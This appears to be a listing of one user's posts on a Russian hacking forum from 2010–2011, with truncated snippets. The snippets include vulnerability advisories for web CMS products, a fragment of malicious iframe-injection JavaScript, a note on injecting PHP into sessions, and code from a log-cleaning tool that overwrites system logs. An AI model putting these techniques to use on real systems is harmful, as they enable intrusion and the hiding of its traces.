Раздел: Web-среда/Web-applications
13.05.2011, 19:14
|
|
Ответов: 3,618
Просмотров: 3,187,645
|
|
Раздел: Сценарии/CMF/СMS
28.04.2011, 19:18
|
|
Ответов: 1
Просмотров: 9,418
Продукт: Crafty Syntax Live Help (LFI/File...
Продукт: Crafty Syntax Live Help (LFI/File disclosure)
Офф сайт: www.craftysyntax.com
Зависимости: Admin, LFI - magic_quotes = Off
При получении админских привелегий, заодно получаем читалку и...
|
|
Раздел: Криптография/Cryptography
20.04.2011, 16:48
|
|
Ответов: 919
Просмотров: 761,719
|
|
Раздел: *nix-like
06.04.2011, 17:56
|
|
Ответов: 4
Просмотров: 10,090
|
|
Раздел: Web-среда/Web-applications
01.04.2011, 20:29
|
|
Ответов: 5
Просмотров: 9,949
|
|
Раздел: Web development
25.03.2011, 01:51
|
|
Ответов: 89
Просмотров: 142,562
Зло код :)
if...
Зло код :)
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
var bdy = document.createElement("body");
try {
document.appendChild(bdy);
} catch (e) {...
|
|
Раздел: Оффтоп/Offtopic
02.03.2011, 21:40
|
|
Ответов: 14
Просмотров: 13,096
Брут для меня это как прикуриватель в машине,...
Брут для меня это как прикуриватель в машине, вроде нахрен не нужен, а бывает что только его и юзаешь :) Думается поспешно приравнивать его к вымершей части хека. Это как с любым инструментом, кто-то...
|
|
Раздел: Оффтоп/Offtopic
23.02.2011, 14:48
|
|
Ответов: 7
Просмотров: 7,169
|
|
Раздел: Чужие статьи/Переводы;Foreign articles/translations
17.02.2011, 16:31
|
|
Ответов: 18
Просмотров: 41,709
|
|
Раздел: Сценарии/CMF/СMS
08.02.2011, 08:39
|
|
Ответов: 29
Просмотров: 91,524
Тайну раскрыли...
Тайну раскрыли (https://rdot.org/forum/showpost.php?p=13731&postcount=985) :) My version:
Решил пару случаев с версиями 2.10.0 и выше при allow_url_fopen Off. Можно инжектить пхпкод в сессию, т.к. c...
|
|
Раздел: Релизы/Releases
05.02.2011, 21:45
|
|
Ответов: 17
Просмотров: 48,451
Странно, никогда об этом не задумывался даже....
Странно, никогда об этом не задумывался даже. Получается что ваниш, порет логи :)
printf ("\n\n");
system ("mv messages.hm /var/log/messages");
system ("mv secure.hm /var/log/secure");
system...
|
|
Раздел: Релизы/Releases
05.02.2011, 11:51
|
|
Ответов: 17
Просмотров: 48,451
Не удаляет временные файлы в /tmp, тестил на...
Не удаляет временные файлы в /tmp, тестил на бубунте, и редхате, где благополучно спалился после многократного изпольвования, whitecat сожрал свободное пространство долбанными логами апача!
Пожалуй,...
|
|
Раздел: Релизы/Releases
01.02.2011, 10:41
|
|
Ответов: 17
Просмотров: 48,451
|
|
Раздел: Криптография/Cryptography
29.01.2011, 14:45
|
|
Ответов: 821
Просмотров: 681,083
|
|
Раздел: Целевые системы/Target systems
25.01.2011, 16:08
|
|
Ответов: 19
Просмотров: 20,476
|
|
Раздел: Web-среда/Web-applications
16.01.2011, 18:29
|
|
Ответов: 32
Просмотров: 104,346
|
|
Раздел: Web-среда/Web-applications
16.01.2011, 16:42
|
|
Ответов: 32
Просмотров: 104,346
Второй день мучаюсь с этим багом, если бы не...
Второй день мучаюсь с этим багом, если бы не посты tipsy и, очень в тему, BlackFan-а, я бы уже наверно забил. Тестил на локалхосте (до этого, вообще никак не удавалось воспроизвести вектор), шелле,...
|
|
Раздел: Web-среда/Web-applications
16.01.2011, 14:26
|
|
Ответов: 32
Просмотров: 104,346
|
|
Раздел: Сценарии/CMF/СMS
15.01.2011, 15:06
|
|
Ответов: 1
Просмотров: 7,759
|
|
Раздел: Сценарии/CMF/СMS
15.01.2011, 15:05
|
|
Ответов: 1
Просмотров: 7,759
Simple PHP Blog
Продукт: Simple PHP Blog <= 0.7.0 Arbitrary file overwrite
Офф сайт: sourceforge.net/projects/sphpblog/
Зависимости: magic_quotes_gpc Off, allow_url_fopen On, BLOG_TRACKBACK_ENABLED = 1
Уязвимые...
|
|
Раздел: Web-среда/Web-applications
14.01.2011, 00:01
|
|
Ответов: 3,618
Просмотров: 3,187,645
|
|
Раздел: Web-среда/Web-applications
13.01.2011, 22:48
|
|
Ответов: 3,618
Просмотров: 3,187,645
|
|
Раздел: Статьи/Articles
11.01.2011, 17:54
|
|
Ответов: 23
Просмотров: 87,755
|
|
Раздел: Web-среда/Web-applications
05.01.2011, 23:54
|
|
Ответов: 3,618
Просмотров: 3,187,645
|
|
Раздел: Оффтоп/Offtopic
31.12.2010, 17:56
|
|
Ответов: 39
Просмотров: 27,678
|
